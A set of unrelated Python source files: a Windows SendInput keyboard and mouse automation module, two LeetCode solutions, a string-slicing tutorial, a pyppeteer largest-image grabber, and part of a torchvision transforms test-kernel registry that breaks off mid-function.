        tokens (in which case nothing is queued at all).
        """
        # print keys
        if not self.standalone:
            self.common.info("Processing keys: %s" % string)
        key_queue = []
        errors = []
        # defaults to direct keys
        key_type = self.direct_keys
        # split by comma; upper-case once so all comparisons below are uniform
        keys = string.upper().split(",")
        # translate
        for key in keys:
            # up, down or stroke?
            up = True
            down = True
            direction = key.split("_")
            subkey = direction[0]
            if len(direction) >= 2:
                if direction[1] == 'UP':
                    down = False
                else:
                    up = False
            # switch to virtual keys
            if subkey == "VK":
                key_type = self.virtual_keys
            # switch to direct keys
            elif subkey == "DK":
                key_type = self.direct_keys
            # raw hex key code; the string was upper-cased above, so the prefix
            # is "0X" here (bug fix: the old check for "0x" could never match)
            elif subkey.startswith("0X"):
                subkey = int(subkey, 16)
                if subkey > 0 and subkey < 256:
                    key_queue.append({
                        "key": int(subkey),
                        "okey": subkey,
                        "time": 0,
                        "up": up,
                        "down": down,
                        "type": key_type,
                    })
                else:
                    errors.append(key)
            # pause
            elif subkey.startswith("-"):
                time = float(subkey.replace("-", ""))/1000
                if time > 0 and time <= 10:
                    key_queue.append({
                        "key": None,
                        "okey": "",
                        "time": time,
                        "up": False,
                        "down": False,
                        "type": None,
                    })
                else:
                    errors.append(key)
            # direct key
            elif key_type == self.direct_keys and subkey in self.dk:
                key_queue.append({
                    "key": self.dk[subkey],
                    "okey": subkey,
                    "time": 0,
                    "up": up,
                    "down": down,
                    "type": key_type,
                })
            # virtual key
            elif key_type == self.virtual_keys and subkey in self.vk:
                key_queue.append({
                    "key": self.vk[subkey],
                    "okey": subkey,
                    "time": 0,
                    "up": up,
                    "down": down,
                    "type": key_type,
                })
            # no match?
            else:
                errors.append(key)
        # if there are errors, do not process keys
        if len(errors):
            return errors
        # create new thread if there is no active one
        # (bug fix: Thread.isAlive() was removed in Python 3.9 -> is_alive())
        if self.keys_process is None or not self.keys_process.is_alive():
            self.keys_process = Thread(target=self.keys_worker.processQueue)
            self.keys_process.start()
        # add keys to queue
        for i in key_queue:
            self.keys_worker.key_queue.put(i)
        self.keys_worker.key_queue.put(None)
        return True

    # direct key press
    def directKey(self, key, direction = None, type = None):
        """Send a single key event immediately (synchronously).

        ``key`` is a name from ``dk``/``vk`` or a "0x.." hex code string;
        ``direction`` defaults to ``key_press``; ``type`` defaults to
        ``direct_keys``.
        """
        if type is None:
            type = self.direct_keys
        if direction is None:
            direction = self.key_press
        if isinstance(key, str) and key.lower().startswith("0x"):
            # bug fix: a parsed hex code must be sent as-is; previously it was
            # looked up in the string-keyed table and always replaced by 0.
            key = int(key, 16)
        else:
            key = key.upper()
            lookup_table = self.dk if type == self.direct_keys else self.vk
            key = lookup_table[key] if key in lookup_table else 0x0000
        self.keys_worker.sendKey(key, direction | type)

    # direct mouse move or button press
    def directMouse(self, dx = 0, dy = 0, buttons = 0):
        """Move the mouse by (dx, dy) pixels and/or send the given button flags."""
        self.keys_worker.sendMouse(dx, dy, buttons)
# threaded sending keys class
class KeysWorker():
    """Drains the key queue and performs the raw Win32 ``SendInput`` calls.

    Uses ``ctypes.windll.user32``, so this only works on Windows. Instances
    are driven either synchronously (``sendKey``/``sendMouse``) or by running
    ``processQueue`` on a worker thread (see ``Keys.parseKeyString``).
    """
    # owning Keys object (provides flag constants and the optional logger)
    keys = None
    # queue of key dicts produced by Keys.parseKeyString; a None entry makes
    # the worker thread exit once the queue has drained
    key_queue = Queue()
    # init
    def __init__(self, keys):
        self.keys = keys
    # main function, process key's queue in loop
    def processQueue(self):
        """Process queued key events until a terminating None is reached."""
        # endless loop
        while True:
            # get one key
            key = self.key_queue.get()
            # terminate process if queue is empty
            if key is None:
                self.key_queue.task_done()
                if self.key_queue.empty():
                    return
                continue
            # print key
            elif not self.keys.standalone:
                self.keys.common.info("Key: \033[1;35m%s/%s\033[0;37m, duration: \033[1;35m%f\033[0;37m, direction: \033[1;35m%s\033[0;37m, type: \033[1;35m%s" % (
                    key["okey"] if key["okey"] else "None",
                    key["key"], key["time"],
                    "UP" if key["up"] and not key["down"] else "DOWN" if not key["up"] and key["down"] else "BOTH" if key["up"] and key["down"] else "NONE",
                    "None" if key["type"] is None else "DK" if key["type"] == self.keys.direct_keys else "VK"), "\033[0;35mKEY: \033[0;37m"
                )
            # if it's a key
            if key["key"]:
                # press
                if key["down"]:
                    self.sendKey(key["key"], self.keys.key_press | key["type"])
                # wait
                sleep(key["time"])
                # and release
                if key["up"]:
                    self.sendKey(key["key"], self.keys.key_release | key["type"])
            # not an actual key, just pause
            else:
                sleep(key["time"])
            # mark as done (decrement internal queue counter)
            self.key_queue.task_done()
    # send key
    def sendKey(self, key, type):
        """Send one keyboard event; ``type`` carries press/release and DK/VK flags."""
        self.SendInput(self.Keyboard(key, type))
    # send mouse
    def sendMouse(self, dx, dy, buttons):
        """Send one mouse event; adds the move flag when dx/dy are non-zero."""
        if dx != 0 or dy != 0:
            buttons |= self.keys.mouse_move
        self.SendInput(self.Mouse(buttons, dx, dy))
    # send input
    def SendInput(self, *inputs):
        """Marshal INPUT structures into an array and call user32.SendInput."""
        nInputs = len(inputs)
        LPINPUT = INPUT * nInputs
        pInputs = LPINPUT(*inputs)
        cbSize = ctypes.c_int(ctypes.sizeof(INPUT))
        return ctypes.windll.user32.SendInput(nInputs, pInputs, cbSize)
    # get input object
    def Input(self, structure):
        """Wrap a payload structure in an INPUT with the matching type tag."""
        if isinstance(structure, MOUSEINPUT):
            return INPUT(0, _INPUTunion(mi=structure))
        if isinstance(structure, KEYBDINPUT):
            return INPUT(1, _INPUTunion(ki=structure))
        if isinstance(structure, HARDWAREINPUT):
            return INPUT(2, _INPUTunion(hi=structure))
        raise TypeError('Cannot create INPUT structure!')
    # mouse input
    def MouseInput(self, flags, x, y, data):
        """Build a MOUSEINPUT (time=0 lets the system timestamp the event)."""
        return MOUSEINPUT(x, y, data, flags, 0, None)
    # keyboard input
    def KeybdInput(self, code, flags):
        """Build a KEYBDINPUT; the same code fills both wVk and wScan."""
        return KEYBDINPUT(code, code, flags, 0, None)
    # hardware input
    def HardwareInput(self, message, parameter):
        """Build a HARDWAREINPUT, splitting the parameter into low/high words."""
        return HARDWAREINPUT(message & 0xFFFFFFFF,
                             parameter & 0xFFFF,
                             parameter >> 16 & 0xFFFF)
    # mouse object
    def Mouse(self, flags, x=0, y=0, data=0):
        """Return a ready-to-send INPUT for a mouse event."""
        return self.Input(self.MouseInput(flags, x, y, data))
    # keyboard object
    def Keyboard(self, code, flags=0):
        """Return a ready-to-send INPUT for a keyboard event."""
        return self.Input(self.KeybdInput(code, flags))
    # hardware object
    def Hardware(self, message, parameter=0):
        """Return a ready-to-send INPUT for a hardware event."""
        return self.Input(self.HardwareInput(message, parameter))
# types
# ctypes aliases for the Win32 types used by the input structures below.
LONG = ctypes.c_long
DWORD = ctypes.c_ulong
ULONG_PTR = ctypes.POINTER(DWORD)
WORD = ctypes.c_ushort
# Mirror of the Win32 MOUSEINPUT structure (motion deltas + button flags).
class MOUSEINPUT(ctypes.Structure):
    _fields_ = (('dx', LONG),
                ('dy', LONG),
                ('mouseData', DWORD),
                ('dwFlags', DWORD),
                ('time', DWORD),
                ('dwExtraInfo', ULONG_PTR))
# Mirror of the Win32 KEYBDINPUT structure (virtual key, scan code, flags).
class KEYBDINPUT(ctypes.Structure):
    _fields_ = (('wVk', WORD),
                ('wScan', WORD),
                ('dwFlags', DWORD),
                ('time', DWORD),
                ('dwExtraInfo', ULONG_PTR))
# Mirror of the Win32 HARDWAREINPUT structure.
class HARDWAREINPUT(ctypes.Structure):
    _fields_ = (('uMsg', DWORD),
                ('wParamL', WORD),
                ('wParamH', WORD))
# Union of the three payloads, as expected by SendInput.
class _INPUTunion(ctypes.Union):
    _fields_ = (('mi', MOUSEINPUT),
                ('ki', KEYBDINPUT),
                ('hi', HARDWAREINPUT))
# Top-level INPUT: type tag (0=mouse, 1=keyboard, 2=hardware; see
# KeysWorker.Input) plus the payload union.
class INPUT(ctypes.Structure):
    _fields_ = (('type', DWORD),
                ('union', _INPUTunion))
# example usage; requires Windows (SendInput) and a focused target window
if __name__ == '__main__':
    # give the user time to focus the target window before input is sent
    sleep(3)
    keys = Keys()
    # mouse movement: move the cursor left by i pixels per iteration
    for i in range(100):
        keys.directMouse(-1*i, 0)
        sleep(0.004)
    # mouse buttons: right press, left press, left release, right release
    keys.directMouse(buttons=keys.mouse_rb_press)
    sleep(0.5)
    keys.directMouse(buttons=keys.mouse_lb_press)
    sleep(2)
    keys.directMouse(buttons=keys.mouse_lb_release)
    sleep(0.5)
    keys.directMouse(buttons=keys.mouse_rb_release)
    # or combine several button flags in a single call
    keys.directMouse(buttons=keys.mouse_lb_press | keys.mouse_rb_press)
    sleep(2)
    keys.directMouse(buttons=keys.mouse_lb_release | keys.mouse_rb_release)
    # keyboard (direct keys)
    keys.directKey("a")
    sleep(0.04)
    keys.directKey("a", keys.key_release)
    # keyboard (virtual keys)
    keys.directKey("a", type=keys.virtual_keys)
    sleep(0.04)
    keys.directKey("a", keys.key_release, keys.virtual_keys)
    # queue of keys (direct keys, threaded, only for keyboard input)
    keys.parseKeyString("a_down,-4,a_up,0x01") # -4 - pause for 4 ms, 0x01 - hex code of Esc
    # queue of keys (virtual keys, threaded, only for keyboard input)
    keys.parseKeyString("vk,a_down,-4,a_up") # -4 - pause for 4 ms
|
# -*- encoding:utf-8 -*-
# __author__=='Gan'
#
# A self-dividing number is a number that is divisible by every digit it contains.
# For example, 128 is a self-dividing number because 128 % 1 == 0, 128 % 2 == 0, and 128 % 8 == 0.
# Also, a self-dividing number is not allowed to contain the digit zero.
# Given a lower and upper number bound, output a list of every possible self dividing number,
# including the bounds if possible.
# Example 1:
# Input:
# left = 1, right = 22
# Output: [1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 15, 22]
# Leetcode Weekly Contest 59.
class Solution(object):
    def selfDividingNumbers(self, left, right):
        """Return every self-dividing number in [left, right].

        A self-dividing number is divisible by each of its digits and
        contains no zero digit (e.g. 128: 128 % 1 == 128 % 2 == 128 % 8 == 0).

        :type left: int
        :type right: int
        :rtype: List[int]
        """
        def is_self_dividing(number):
            # Mirrors the original shortcut: any nonzero number below 10
            # passes outright.
            if number != 0 and number < 10:
                return True
            for ch in str(number):
                digit = int(ch)
                if digit == 0 or number % digit:
                    return False
            return True

        return [number for number in range(left, right + 1) if is_self_dividing(number)]
# Elegant Solution
class Solution(object):
    def selfDividingNumbers(self, left, right):
        """Return every self-dividing number in [left, right].

        :type left: int
        :type right: int
        :rtype: List[int]
        """
        def is_self_dividing(num):
            digits = str(num)
            return '0' not in digits and all(num % int(d) == 0 for d in digits)

        return [num for num in range(left, right + 1) if is_self_dividing(num)]
if __name__ == '__main__':
    # Smoke test: expect [1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 15, 22] and [].
    print(Solution().selfDividingNumbers(1, 22))
    print(Solution().selfDividingNumbers(0, 0))
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
s = 'spam'
# -------------------- Indexing and slicing --------------------
# Indexing s[i] fetches the element at offset i:
#   the first element is at offset 0
#   the last element is at offset -1
print('-' * 20, ' 索引和分片 ', '-' * 20)
print('索引s[1]:\n\t%s' % s[1])
print('索引s[2]:\n\t%s' % s[2])
print('索引s[-2]:\n\t%s' % s[-2])
print('负数索引+字符串长度=索引位置!\n')
# Slicing s[i: j] extracts the substring at offsets [i, j)
# (lower bound inclusive, upper bound exclusive)
print('分片s[:]:\n\t%s\n' % s[:])
print('分片s[1:]:\n\t%s' % s[1:])
print('分片s[0: 2]:\n\t%s' % s[0: 2])
print('分片s[: 3]:\n\t%s' % s[: 3])
print('分片s[: -1]:\n\t%s' % s[: -1])
print('分片s[0: -1]:\n\t%s' % s[0: -1])
# Stepped slicing s[i: j: k] takes every k-th element within [i, j)
a = '1234567890'
print('步进a[1: 10: 2]:\n\t%s' % a[1: 10: 2])
print('步进a[0: 10: 3]:\n\t%s' % a[0: 10: 3])
|
import logging
logger = logging.getLogger(__name__)
def grab_largest_image(url):
    """Render *url* in headless Chromium and return the absolute URL of the
    largest image on the page (by natural pixel area), or None on failure.

    Blocks until rendering finishes; requires the ``pyppeteer`` package.
    """
    import asyncio

    from pyppeteer import launch

    async def main():
        browser = None
        try:
            browser = await launch()
            page = await browser.newPage()
            logger.info(f"Opening page {url}")
            await page.goto(url, timeout=10000)
            # Pick the <img> with the largest naturalWidth * naturalHeight and
            # resolve its src to an absolute URL via a temporary anchor element.
            max_img = await page.evaluate('''() => {
                var images = document.getElementsByTagName('img')
                var maxImg = null, maxArea=0, anchor;
                for (var i=0, len=images.length; i<len; i++) {
                    img = images[i];
                    var imgArea = img.naturalWidth * img.naturalHeight;
                    if (imgArea > maxArea) {
                        maxArea = imgArea;
                        maxImg = img.src
                    }
                }
                if (maxImg) {
                    anchor = document.createElement('a');
                    anchor.href = maxImg;
                    return anchor.href; // return the absolute path
                }
                return maxImg
            }''')
            return max_img
        except Exception:
            # Bug fix: log the traceback instead of silently discarding the
            # exception detail; the function still returns None on failure.
            logger.exception(f"Error rendering page {url}")
            return None
        finally:
            if browser:
                await browser.close()

    # asyncio.run creates and closes a fresh event loop; get_event_loop() is
    # deprecated for this usage since Python 3.10.
    return asyncio.run(main())
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
class Solution(object):
    def isAnagram(self, s, t):
        """Return True if *t* is an anagram of *s*.

        :type s: str
        :type t: str
        :rtype: bool
        """
        # Different lengths can never be anagrams; cheap early exit.
        if len(s) != len(t):
            return False
        # Two strings are anagrams exactly when their sorted character
        # sequences are equal (replaces the manual list/sort/compare dance).
        return sorted(s) == sorted(t)
# Ad-hoc smoke test: one anagram pair and two negative cases.
x = Solution()
s1 = "anagram"
t1 = "nagaram"
s2 = "rat"
t2 = "car"
s3 = "aacc"
t3 = "ccac"
for pair in ((s1, t1), (s2, t2), (s3, t3)):
    print(x.isAnagram(*pair))
|
import functools
import itertools
import numpy as np
import PIL.Image
import pytest
import torch.testing
import torchvision.ops
import torchvision.transforms.v2.functional as F
from torchvision import tv_tensors
from torchvision.transforms._functional_tensor import _max_value as get_max_value, _parse_pad_padding
from transforms_v2_legacy_utils import (
ArgsKwargs,
combinations_grid,
DEFAULT_PORTRAIT_SPATIAL_SIZE,
get_num_channels,
ImageLoader,
InfoBase,
make_bounding_box_loader,
make_bounding_box_loaders,
make_detection_mask_loader,
make_image_loader,
make_image_loaders,
make_image_loaders_for_interpolation,
make_mask_loaders,
make_video_loader,
make_video_loaders,
mark_framework_limitation,
TestMark,
)
__all__ = ["KernelInfo", "KERNEL_INFOS"]
class KernelInfo(InfoBase):
    """Metadata describing how a single low-level kernel is tested.

    Args:
        kernel: the kernel under test.
        kernel_name: overrides ``kernel.__name__`` as the id. Should be set if
            the function is exposed under a different name.
            TODO: can probably be removed after roll-out, since there should
            be no aliasing then.
        sample_inputs_fn: inputs used by most common tests. Should cover all
            valid code paths, but stay moderate in parameter combinations.
        reference_fn: mirrors the kernel with the same tensor signature; any
            conversion (PIL, numpy, ...) happens inside. Must return something
            comparable to a tensor by ``assert_close``. If omitted, no
            reference test is performed.
        reference_inputs_fn: inputs for the reference tests only; may be
            comprehensive. Defaults to ``sample_inputs_fn``.
        float32_vs_uint8: if truthy, triggers a uint8-vs-float32 consistency
            test against the reference inputs (usual with PIL references).
            May be a callable ``(other_args, kwargs) -> (other_args, kwargs)``
            adapting parameters whose values are tied to the input dtype.
        logs_usage: if set, asserts that the kernel logs its own usage
            (for kernels without a dispatcher that would do it).
        test_marks: see ``InfoBase``.
        closeness_kwargs: see ``InfoBase``.
    """

    def __init__(
        self,
        kernel,
        *,
        kernel_name=None,
        sample_inputs_fn,
        reference_fn=None,
        reference_inputs_fn=None,
        float32_vs_uint8=False,
        logs_usage=False,
        test_marks=None,
        closeness_kwargs=None,
    ):
        super().__init__(id=kernel_name or kernel.__name__, test_marks=test_marks, closeness_kwargs=closeness_kwargs)
        self.kernel = kernel
        self.sample_inputs_fn = sample_inputs_fn
        self.reference_fn = reference_fn
        self.reference_inputs_fn = reference_inputs_fn
        # Normalize a truthy non-callable flag into the identity adapter.
        if float32_vs_uint8 and not callable(float32_vs_uint8):
            def float32_vs_uint8(other_args, kwargs):
                return other_args, kwargs
        self.float32_vs_uint8 = float32_vs_uint8
        self.logs_usage = logs_usage
def pixel_difference_closeness_kwargs(uint8_atol, *, dtype=torch.uint8, mae=False):
    """Scale a uint8 absolute tolerance to the value range of *dtype*."""
    scaled_atol = uint8_atol / 255 * get_max_value(dtype)
    return {"atol": scaled_atol, "rtol": 0, "mae": mae}
def cuda_vs_cpu_pixel_difference(atol=1):
    """Closeness kwargs for the CUDA-vs-CPU test, for uint8 and float32 inputs."""
    test_id = ("TestKernels", "test_cuda_vs_cpu")
    tolerances = {}
    for dtype in (torch.uint8, torch.float32):
        tolerances[(test_id, dtype, "cuda")] = pixel_difference_closeness_kwargs(atol, dtype=dtype)
    return tolerances
def pil_reference_pixel_difference(atol=1, mae=False):
    """Closeness kwargs for uint8 CPU comparisons against the PIL reference."""
    key = (("TestKernels", "test_against_reference"), torch.uint8, "cpu")
    return {key: pixel_difference_closeness_kwargs(atol, mae=mae)}
def float32_vs_uint8_pixel_difference(atol=1, mae=False):
    """Closeness kwargs for the float32-vs-uint8 consistency test on CPU."""
    key = (("TestKernels", "test_float32_vs_uint8"), torch.float32, "cpu")
    return {key: pixel_difference_closeness_kwargs(atol, dtype=torch.float32, mae=mae)}
def scripted_vs_eager_float64_tolerances(device, atol=1e-6, rtol=1e-6):
    """Tolerances for the scripted-vs-eager test with float64 inputs on *device*."""
    key = (("TestKernels", "test_scripted_vs_eager"), torch.float64, device)
    return {key: {"atol": atol, "rtol": rtol, "mae": False}}
def pil_reference_wrapper(pil_kernel):
    """Wrap a PIL kernel so it accepts a uint8 tensor image and returns a tensor."""

    @functools.wraps(pil_kernel)
    def wrapper(input_tensor, *other_args, **kwargs):
        if input_tensor.dtype != torch.uint8:
            raise pytest.UsageError(f"Can only test uint8 tensor images against PIL, but input is {input_tensor.dtype}")
        if input_tensor.ndim > 3:
            raise pytest.UsageError(
                f"Can only test single tensor images against PIL, but input has shape {input_tensor.shape}"
            )
        output = pil_kernel(F.to_pil_image(input_tensor), *other_args, **kwargs)
        if not isinstance(output, PIL.Image.Image):
            return output
        output_tensor = F.to_image(output)
        # Align mask dimensionality: PIL drops/adds the channel dim for 2D masks.
        if output_tensor.ndim == 2 and input_tensor.ndim == 3:
            return output_tensor.unsqueeze(0)
        if output_tensor.ndim == 3 and input_tensor.ndim == 2:
            return output_tensor.squeeze(0)
        return output_tensor

    return wrapper
def xfail_jit(reason, *, condition=None):
    """TestMark that xfails the scripted-vs-eager test for the given *reason*."""
    mark = pytest.mark.xfail(reason=reason)
    return TestMark(("TestKernels", "test_scripted_vs_eager"), mark, condition=condition)
def xfail_jit_python_scalar_arg(name, *, reason=None):
    """xfail JIT tests whose kwarg *name* is a bare Python int/float scalar."""
    reason = reason or f"Python scalar int or float for `{name}` is not supported when scripting"

    def uses_python_scalar(args_kwargs):
        return isinstance(args_kwargs.kwargs.get(name), (int, float))

    return xfail_jit(reason, condition=uses_python_scalar)
# Global registry of KernelInfo entries, populated by the sections below.
KERNEL_INFOS = []
def get_fills(*, num_channels, dtype):
    """Yield representative fill values: None, int/float scalars, and
    per-channel lists/tuples (the sequence variants only when multi-channel).
    """
    yield None
    int_value = get_max_value(dtype)
    float_value = int_value / 2
    yield int_value
    yield float_value
    for seq_type in (list, tuple):
        yield seq_type([int_value])
        yield seq_type([float_value])
        if num_channels > 1:
            yield seq_type(float_value * c / 10 for c in range(num_channels))
            yield seq_type(int_value if c % 2 == 0 else 0 for c in range(num_channels))
def float32_vs_uint8_fill_adapter(other_args, kwargs):
    """Rescale an integer-range ``fill`` kwarg from [0, 255] to [0, 1]."""
    fill = kwargs.get("fill")
    if fill is None:
        return other_args, kwargs
    if isinstance(fill, (int, float)):
        scaled = fill / 255
    else:
        scaled = type(fill)(component / 255 for component in fill)
    return other_args, dict(kwargs, fill=scaled)
def reference_affine_bounding_boxes_helper(bounding_boxes, *, format, canvas_size, affine_matrix):
    """Apply a 2x3 affine matrix to boxes by mapping their corner points.

    Each box is converted to XYXY, its four corners are pushed through
    ``affine_matrix``, the enclosing axis-aligned box is taken, converted back
    to *format*, clamped to *canvas_size*, and cast back to the input dtype.
    """
    def transform(bbox, affine_matrix_, format_, canvas_size_):
        # Go to float before converting to prevent precision loss in case of CXCYWH -> XYXY and W or H is 1
        in_dtype = bbox.dtype
        if not torch.is_floating_point(bbox):
            bbox = bbox.float()
        bbox_xyxy = F.convert_bounding_box_format(
            bbox.as_subclass(torch.Tensor),
            old_format=format_,
            new_format=tv_tensors.BoundingBoxFormat.XYXY,
            inplace=True,
        )
        # Homogeneous coordinates of the four box corners.
        points = np.array(
            [
                [bbox_xyxy[0].item(), bbox_xyxy[1].item(), 1.0],
                [bbox_xyxy[2].item(), bbox_xyxy[1].item(), 1.0],
                [bbox_xyxy[0].item(), bbox_xyxy[3].item(), 1.0],
                [bbox_xyxy[2].item(), bbox_xyxy[3].item(), 1.0],
            ]
        )
        transformed_points = np.matmul(points, affine_matrix_.T)
        # Axis-aligned box enclosing all transformed corners.
        out_bbox = torch.tensor(
            [
                np.min(transformed_points[:, 0]).item(),
                np.min(transformed_points[:, 1]).item(),
                np.max(transformed_points[:, 0]).item(),
                np.max(transformed_points[:, 1]).item(),
            ],
            dtype=bbox_xyxy.dtype,
        )
        out_bbox = F.convert_bounding_box_format(
            out_bbox, old_format=tv_tensors.BoundingBoxFormat.XYXY, new_format=format_, inplace=True
        )
        # It is important to clamp before casting, especially for CXCYWH format, dtype=int64
        out_bbox = F.clamp_bounding_boxes(out_bbox, format=format_, canvas_size=canvas_size_)
        out_bbox = out_bbox.to(dtype=in_dtype)
        return out_bbox
    return torch.stack(
        [transform(b, affine_matrix, format, canvas_size) for b in bounding_boxes.reshape(-1, 4).unbind()]
    ).reshape(bounding_boxes.shape)
def sample_inputs_convert_bounding_box_format():
    """Yield one sample per (loader, target format) pair over all formats."""
    all_formats = list(tv_tensors.BoundingBoxFormat)
    loaders = make_bounding_box_loaders(formats=all_formats)
    for loader, target_format in itertools.product(loaders, all_formats):
        yield ArgsKwargs(loader, old_format=loader.format, new_format=target_format)
def reference_convert_bounding_box_format(bounding_boxes, old_format, new_format):
    """Reference via torchvision.ops.box_convert, cast back to the input dtype."""
    converted = torchvision.ops.box_convert(
        bounding_boxes, in_fmt=old_format.name.lower(), out_fmt=new_format.name.lower()
    )
    return converted.to(bounding_boxes.dtype)
def reference_inputs_convert_bounding_box_format():
    """Restrict the sample inputs to 2D boxes, which the reference accepts."""
    yield from (
        args_kwargs
        for args_kwargs in sample_inputs_convert_bounding_box_format()
        if len(args_kwargs.args[0].shape) == 2
    )
# Register convert_bounding_box_format against the box_convert reference.
KERNEL_INFOS.append(
    KernelInfo(
        F.convert_bounding_box_format,
        sample_inputs_fn=sample_inputs_convert_bounding_box_format,
        reference_fn=reference_convert_bounding_box_format,
        reference_inputs_fn=reference_inputs_convert_bounding_box_format,
        logs_usage=True,
        closeness_kwargs={
            # atol=1 for int64 boxes -- NOTE(review): presumably absorbs
            # rounding differences vs the float-based reference; confirm.
            (("TestKernels", "test_against_reference"), torch.int64, "cpu"): dict(atol=1, rtol=0),
        },
    ),
)
# Crop/resize parameter grid shared by all resized_crop sample/reference inputs.
_RESIZED_CROP_PARAMS = combinations_grid(top=[-8, 9], left=[-8, 9], height=[12], width=[12], size=[(16, 18)])
def sample_inputs_resized_crop_image_tensor():
    """One sample per image loader using the first resized-crop parameter set."""
    params = _RESIZED_CROP_PARAMS[0]
    for img_loader in make_image_loaders():
        yield ArgsKwargs(img_loader, **params)
@pil_reference_wrapper
def reference_resized_crop_image_tensor(*args, **kwargs):
    """PIL reference; rejects calls that disable antialiasing for bilinear/bicubic."""
    antialias = kwargs.pop("antialias", False)
    interpolation = kwargs.get("interpolation", F.InterpolationMode.BILINEAR)
    if not antialias and interpolation in {F.InterpolationMode.BILINEAR, F.InterpolationMode.BICUBIC}:
        raise pytest.UsageError("Anti-aliasing is always active in PIL")
    return F._resized_crop_image_pil(*args, **kwargs)
def reference_inputs_resized_crop_image_tensor():
    """All combinations of interpolation modes and crop params for the PIL reference."""
    modes = [
        F.InterpolationMode.NEAREST,
        F.InterpolationMode.NEAREST_EXACT,
        F.InterpolationMode.BILINEAR,
        F.InterpolationMode.BICUBIC,
    ]
    antialiased_modes = {F.InterpolationMode.BILINEAR, F.InterpolationMode.BICUBIC}
    for img_loader, mode, params in itertools.product(
        make_image_loaders_for_interpolation(), modes, _RESIZED_CROP_PARAMS
    ):
        yield ArgsKwargs(
            img_loader,
            interpolation=mode,
            antialias=mode in antialiased_modes,
            **params,
        )
def sample_inputs_resized_crop_bounding_boxes():
    """One sample per bounding-box loader using the first resized-crop parameter set."""
    params = _RESIZED_CROP_PARAMS[0]
    for bbox_loader in make_bounding_box_loaders():
        yield ArgsKwargs(bbox_loader, format=bbox_loader.format, **params)
def sample_inputs_resized_crop_mask():
    """One sample per mask loader using the first resized-crop parameter set."""
    params = _RESIZED_CROP_PARAMS[0]
    for mask_loader in make_mask_loaders():
        yield ArgsKwargs(mask_loader, **params)
def sample_inputs_resized_crop_video():
    """One sample per video loader using the first resized-crop parameter set."""
    params = _RESIZED_CROP_PARAMS[0]
    for vid_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
        yield ArgsKwargs(vid_loader, **params)
# Register the resized_crop kernels (image/bounding boxes/mask/video).
KERNEL_INFOS.extend(
    [
        KernelInfo(
            F.resized_crop_image,
            sample_inputs_fn=sample_inputs_resized_crop_image_tensor,
            reference_fn=reference_resized_crop_image_tensor,
            reference_inputs_fn=reference_inputs_resized_crop_image_tensor,
            float32_vs_uint8=True,
            closeness_kwargs={
                **cuda_vs_cpu_pixel_difference(),
                **pil_reference_pixel_difference(3, mae=True),
                **float32_vs_uint8_pixel_difference(3, mae=True),
            },
        ),
        KernelInfo(
            F.resized_crop_bounding_boxes,
            sample_inputs_fn=sample_inputs_resized_crop_bounding_boxes,
        ),
        KernelInfo(
            F.resized_crop_mask,
            sample_inputs_fn=sample_inputs_resized_crop_mask,
        ),
        KernelInfo(
            F.resized_crop_video,
            sample_inputs_fn=sample_inputs_resized_crop_video,
            closeness_kwargs=cuda_vs_cpu_pixel_difference(),
        ),
    ]
)
# Padding parameter grid shared by the pad reference inputs below.
_PAD_PARAMS = combinations_grid(
    padding=[[1], [1, 1], [1, 1, 2, 2]],
    padding_mode=["constant", "symmetric", "edge", "reflect"],
)
def sample_inputs_pad_image_tensor():
    """Samples covering padding shapes, fill values, and all padding modes."""
    make_pad_image_loaders = functools.partial(
        make_image_loaders, sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=["RGB"], dtypes=[torch.float32]
    )
    paddings = [1, (1,), (1, 2), (1, 2, 3, 4), [1], [1, 2], [1, 2, 3, 4]]
    for img_loader, padding in itertools.product(make_pad_image_loaders(), paddings):
        yield ArgsKwargs(img_loader, padding=padding)
    for img_loader in make_pad_image_loaders():
        for fill in get_fills(num_channels=img_loader.num_channels, dtype=img_loader.dtype):
            yield ArgsKwargs(img_loader, padding=[1], fill=fill)
    # Non-constant padding branches differently for integer inputs, so cover uint8.
    for img_loader, padding_mode in itertools.product(
        make_pad_image_loaders(dtypes=[torch.uint8]),
        ["constant", "symmetric", "edge", "reflect"],
    ):
        yield ArgsKwargs(img_loader, padding=[1], padding_mode=padding_mode)
    # torch.nn.functional.pad has no symmetric mode, so there is a custom
    # implementation; negative padding is the case not covered above.
    for img_loader in make_pad_image_loaders():
        yield ArgsKwargs(img_loader, padding=[-1], padding_mode="symmetric")
def reference_inputs_pad_image_tensor():
    """uint8 images x full pad-param grid with scalar fills for the PIL reference."""
    loaders = make_image_loaders(extra_dims=[()], dtypes=[torch.uint8])
    for img_loader, params in itertools.product(loaders, _PAD_PARAMS):
        for fill in get_fills(num_channels=img_loader.num_channels, dtype=img_loader.dtype):
            # FIXME: PIL kernel doesn't support sequences of length 1 if the number of channels is larger. Shouldn't it?
            if isinstance(fill, (list, tuple)):
                continue
            yield ArgsKwargs(img_loader, fill=fill, **params)
def sample_inputs_pad_bounding_boxes():
    """Constant-mode padding samples over all padding shapes and box loaders."""
    paddings = [1, (1,), (1, 2), (1, 2, 3, 4), [1], [1, 2], [1, 2, 3, 4]]
    for bbox_loader, padding in itertools.product(make_bounding_box_loaders(), paddings):
        yield ArgsKwargs(
            bbox_loader,
            format=bbox_loader.format,
            canvas_size=bbox_loader.canvas_size,
            padding=padding,
            padding_mode="constant",
        )
def sample_inputs_pad_mask():
    """Single-pixel padding over a representative mask loader."""
    for mask_loader in make_mask_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_categories=[10], num_objects=[5]):
        yield ArgsKwargs(mask_loader, padding=[1])
def reference_inputs_pad_mask():
    """Single-object masks x optional fill x full pad-param grid."""
    loaders = make_mask_loaders(num_objects=[1], extra_dims=[()])
    for mask_loader, fill, params in itertools.product(loaders, [None, 127], _PAD_PARAMS):
        yield ArgsKwargs(mask_loader, fill=fill, **params)
def sample_inputs_pad_video():
    """Single-pixel padding over a representative video loader."""
    for vid_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
        yield ArgsKwargs(vid_loader, padding=[1])
def reference_pad_bounding_boxes(bounding_boxes, *, format, canvas_size, padding, padding_mode):
    """Reference for pad_bounding_boxes: translate boxes by (left, top) and
    grow the canvas accordingly. Returns ``(boxes, (height, width))``.
    """
